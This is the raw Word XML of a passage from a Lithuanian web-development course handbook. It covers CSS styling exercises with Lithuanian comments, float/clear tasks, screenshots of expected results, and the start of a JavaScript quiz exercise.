WEBMASTER. &lt;/h5&gt;</w:t>
      </w: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 xml:space="preserve">        &lt;/footer&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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00323371" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00381F93">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>style.cs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Numatytųjų naršyklės stiliaus taisyklių perrašymas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sos išorinės paraštės (margin) lygios 0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margin:0;</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Šrifto tipo ir dydžio taisyklės visam tinklapiui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body{</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font-family: 'Questrial', sans-serif;</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font-size: 12p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Kelios klasės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description{</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background-color: #F3F3F3;</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contain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dding: 30px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>10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Tinklapio antraštė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lastRenderedPageBreak/>
        <w:t xml:space="preserve">/* header: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fono spalva: #16A085,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background-color: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lt;h1&gt;, esantis &lt;header&gt; dalyj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as: visos didžiosios raidė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dinės paraštės (padding): 20px 0,</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h1{</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transform: uppercas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dding: 20px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>0;</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h3&gt;, esantis &lt;header&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arpai tarp raidžių: 0,3 em</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h3{</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etter-spacing: 0.3em;</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nav&gt;, esantis &lt;header&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ršutinis rėmelis: 2px dashed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ršutinė vidinė paraštė: 20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border-top: 2px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>dashed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>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dding-top: 20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nuoroda, esanti &lt;header&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spalva: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pabraukimo nėr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decoration: non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sąrašas, esantis &lt;header&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sąrašo ženklinimo nėr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sos vidinės paraštės lygios 0;</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ul{</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ist-style: non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dding: 0;</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sąrašas išdėstytas eilutė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li{</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display: inline-block;</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width: 150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seudo klases nuorodoms, &lt;header&gt; dalyj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lastRenderedPageBreak/>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ink</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a:link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visited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a:visited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hov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sktas pabraukta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a:hover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decoration: underlin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activ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pilk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header nav a:activ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grey;</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w:t>
      </w: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xml:space="preserve">    Tinklapio pagrindinė dalis | Main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h3&gt;, esantis &lt;article&g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as: visos didžiosios raidė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arpai tarp raidžių: 0,3em;</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article h3{</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transform: uppercas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etter-spacing: 0.3em;</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ul&gt;, esančio &lt;article&g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ženklinto sąrašo stilius: kvadrata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article ul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ist-style-type: squar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ol&gt;, esančio &lt;article&g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numeracijos stilius: mažosios romėniškos raidė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eilutės aukštis: 2;</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article ol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ist-style-type:lower-roman;</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ine-height: 2;</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lastRenderedPageBreak/>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irmoji &lt;section&gt;, esanti &lt;main&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lygiavimas: centruotas (cent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main section:nth-child(1){</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align: cent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veikla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rėmelis: 1px solid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img{</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border: 1px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>solid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>#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inklapio baigiamoji dalis | foot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footer&gt; daly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lygiavimas: centruotas;</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fono spalva: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foot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align: center;</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background-color: #16A08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nuorodos, esančio &lt;footer&g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pabraukimo nėr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ksto spalva: balt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footer ul a{</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text-decoration: non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color: whit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lt;h5&gt;, esančio &lt;footer&gt; dalyje:</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viršutinės vidinė paraštė: 20px;</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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t> </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footer h5{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>    padding-top: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Bendras rezultatas naršyklėje turi atrodyti taip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46DA6076" wp14:editId="42B36376">
            <wp:extent cx="5937250" cy="2875915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214" name="Picture 19" descr="C:\Users\Justina\Desktop\Screen Shot 2018-05-22 at 23.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ustina\Desktop\Screen Shot 2018-05-22 at 23.08.16.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="15471"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937250" cy="2875915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76FB827A" wp14:editId="29C96FA4">
            <wp:extent cx="5937250" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="215" name="Picture 20" descr="C:\Users\Justina\Desktop\Screen Shot 2018-05-22 at 23.0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stina\Desktop\Screen Shot 2018-05-22 at 23.08.31.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="6406"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937250" cy="3180715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pP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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C87A4B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UŽRAŠYKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS KLASES (PARAMETRAI „FLOAT“ IR „CLEAR“)</w:t>
      </w:r>
      <w:r w:rsidR="006B379B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Bendras rezultatas naršyklėje turi atrodyti taip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCCC105" wp14:editId="5D159982">
            <wp:extent cx="5937250" cy="4108450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216" name="Picture 3" descr="C:\Users\Justina\Desktop\Screen Shot 2018-05-22 at 23.5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ustina\Desktop\Screen Shot 2018-05-22 at 23.57.07.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="12325"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937250" cy="4108450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20AEEF03" wp14:editId="7214174F">
            <wp:extent cx="5937250" cy="4108450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="217" name="Picture 8" descr="C:\Users\Justina\Desktop\Screen Shot 2018-05-22 at 23.5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ustina\Desktop\Screen Shot 2018-05-22 at 23.57.07.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="12325"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937250" cy="4108450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CF2E02" wp14:editId="3224C364">
            <wp:extent cx="5937250" cy="4095115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="218" name="Picture 17" descr="C:\Users\Justina\Desktop\Screen Shot 2018-05-22 at 23.5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ustina\Desktop\Screen Shot 2018-05-22 at 23.57.11.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="12558"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937250" cy="4095115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="360" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="296" w:name="_Toc13833444"/>
      <w:bookmarkStart w:id="297" w:name="_Toc14392510"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Programuoti vartotojo užduočių vykdymą naudojant JavaScript kalbą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
      <w:bookmarkEnd w:id="297"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B45BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TESTĄ, TIKRINANTĮ IR PATEIKIANTĮ TEISINGUS ATSAKYMUS</w:t>
      </w:r>
      <w:r w:rsidR="0051565C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B733C4" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Index.html failas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&gt;</w:t>
      </w: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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;title&gt;JS testas&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;link rel="stylesheet" href="style.css"&gt;</w:t>
      </w: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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;h2&gt;Bootstrap Quiz&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
